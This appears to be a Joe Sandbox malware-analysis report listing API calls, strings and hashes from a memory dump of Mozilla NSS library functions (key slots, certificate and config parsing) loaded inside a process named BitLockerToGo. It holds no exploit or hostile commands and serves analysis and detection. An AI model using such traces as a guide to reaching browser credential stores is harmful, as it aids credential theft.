                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6A4D0B
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C694F51,00000000), ref: 6C6A4D5E
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C694F51,00000000), ref: 6C6A4D68
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C6A4D85
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C6A4DA2
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6A4DB9
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A4DCF
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C686943
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4210: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,BD5F5530,flags,?,00000000,?,6C685947,flags,printPolicyFeedback,?,?,?,?,?,?,00000000), ref: 6C6A4220
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4210: NSSUTIL_ArgGetParamValue.NSS3(?,GYhl,?,?,?,?,?,?,00000000,?,00000000,?,6C687703,?,00000000,00000000), ref: 6C6A422D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4210: PL_strncasecmp.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C687703), ref: 6C6A424B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4210: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C687703,?,00000000), ref: 6C6A4272
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C686957
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C686972
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C686983
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A3EA0: isspace.API-MS-WIN-CRT-STRING-L1-1-0(8914C483,70E85609,6C67C79F,?,6C686247,70E85609,?,?,6C67C79F,6C68781D,?,6C67BD52,00000001,70E85609,D85D8B04,?), ref: 6C6A3EB8
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C6869AA
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C6869BE
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C6869D2
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C6869DF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4020: isspace.API-MS-WIN-CRT-STRING-L1-1-0(FFFFEF69,00000000,?,?,74F84C80,?,6C6A50B7,?), ref: 6C6A4041
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6869F6
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C686A04
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C686A1B
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(-0000000B,?), ref: 6C686A29
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C686A3F
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C686A4D
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgStrip.NSS3(?), ref: 6C686A5B
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: L_strncasecmpValuefree$FetchFlag$Stripisspace$ParamParameterSkipstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: certPrefix=$configdir=$flags$keyPrefix=$nocertdb$nokeydb$readOnly
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2065226673-2785624044
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f853057569ae2deba2f3d953a5f18da274926215ebf7248cc9c54c409821c252
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 66871dfda10af0f12e1d63d68ec4f43d15ace5a4b3250cc3ff6ba940253ed9b6
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f853057569ae2deba2f3d953a5f18da274926215ebf7248cc9c54c409821c252
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8741D4F1E512056BEB00DB74AD85BAB77ACAF1634CF040430E906E6B41FB35DA1987B9
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C686943
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C686957
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C686972
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C686983
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C6869AA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C6869BE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C6869D2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C6869DF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C686A5B
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C686D8C
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C686DC5
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C686DD6
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C686DE7
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C686E1F
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C686E4B
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C686E72
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C686EA7
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C686EC4
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C686ED5
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C686EE3
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C686EF4
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C686F08
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C686F35
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C686F44
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C686F5B
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C686F65
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C68781D,00000000,6C67BE2C,?,6C686B1D,?,?,?,?,00000000,00000000,6C68781D), ref: 6C686C40
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C68781D,?,6C67BE2C,?), ref: 6C686C58
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C68781D), ref: 6C686C6F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C686C84
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C686C96
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C686CAA
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C686F90
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C686FC5
                                                                                                                                                                                                                                                                                                                                                          • PK11_GetInternalKeySlot.NSS3 ref: 6C686FF4
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                                                                                                                                                                                          • String ID: +`il
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1304971872-4003185054
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9b78e154e8a86001db495ad5d38dbf441c34a3be0b3393d40521d1903dc0b324
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 78fc50b1a31d891a66b2987e992a81fea0e48bbea3a589bd29cba980428a8a96
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b78e154e8a86001db495ad5d38dbf441c34a3be0b3393d40521d1903dc0b324
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3B160B0E162099FDF00CFA5D849B9EBBB5BF09349F140024E815E7A40E735E916CBB9
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C64DDDE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6487ED,00000800,6C63EF74,00000000), ref: 6C6A1000
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PR_NewLock.NSS3(?,00000800,6C63EF74,00000000), ref: 6C6A1016
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6487ED,00000008,?,00000800,6C63EF74,00000000), ref: 6C6A102B
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C64DDF5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C64DE34
                                                                                                                                                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C64DE93
                                                                                                                                                                                                                                                                                                                                                          • CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6C64DE9D
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C64DEB4
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C64DEC3
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C64DED8
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s%s,?,?), ref: 6C64DEF0
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(6C77AAF9,(NULL) (Validity Unknown)), ref: 6C64DF04
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C64DF13
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C64DF22
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6C64DF33
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C64DF3C
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C64DF4B
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C64DF74
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C64DF8E
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s%s$(NULL) (Validity Unknown)${???}
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1882561532-3437882492
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6C67094D
                                                                                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C670953
                                                                                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(-00000001,-00000001,-00000001), ref: 6C67096E
                                                                                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001), ref: 6C670974
                                                                                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C67098F
                                                                                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C670995
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C671800: SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C671860
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C671800: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C6709BF), ref: 6C671897
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C671800: memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6718AA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C671800: memcpy.VCRUNTIME140(?,?,?), ref: 6C6718C4
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C670B4F
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C670B5E
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C670B6B
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001), ref: 6C670B78
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: htonl$Item_Util$Zfreememcpy$AllocFreeK11_
                                                                                                                                                                                                                                                                                                                                                          • String ID: base_nonce$exp$info_hash$key$psk_id_hash$secret
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1637529542-763765719
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C682DEC
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C682E00
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C682E2B
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C682E43
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C654F1C,?,-00000001,00000000,?), ref: 6C682E74
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C654F1C,?,-00000001,00000000), ref: 6C682E88
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C682EC6
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C682EE4
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C682EF8
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C682F62
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C682F86
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C), ref: 6C682F9E
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C682FCA
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C68301A
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C68302E
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C683066
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C683085
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C6830EC
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C68310C
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C), ref: 6C683124
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C68314C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C669180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C69379E,?,6C669568,00000000,?,6C69379E,?,00000001,?), ref: 6C66918D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C669180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C69379E,?,6C669568,00000000,?,6C69379E,?,00000001,?), ref: 6C6691A0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307AD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307CD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5C204A), ref: 6C6307E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,6C5C204A), ref: 6C630864
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C630880
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,6C5C204A), ref: 6C6308CB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308D7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308FB
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C68316D
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3383223490-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5e88da1bcd49a876dd9c156c4ca07f07a478f44d5a29fc0990dc40ab4ae14543
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 485478227261115a11dc05ddc9e8c71080e9fc3f64d4925236814458ed3302f7
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e88da1bcd49a876dd9c156c4ca07f07a478f44d5a29fc0990dc40ab4ae14543
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87F17FB1D01209AFDF00DF64D888B9EBBB5BF0A318F144169EC05A7711EB31E995CBA5
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C684C4C
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C684C60
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C684CA1
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C684CBE
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C684CD2
                                                                                                                                                                                                                                                                                                                                                          • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C684D3A
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C684D4F
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C684DB7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: TlsGetValue.KERNEL32 ref: 6C6EDD8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307AD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307CD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5C204A), ref: 6C6307E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,6C5C204A), ref: 6C630864
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C630880
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,6C5C204A), ref: 6C6308CB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308D7
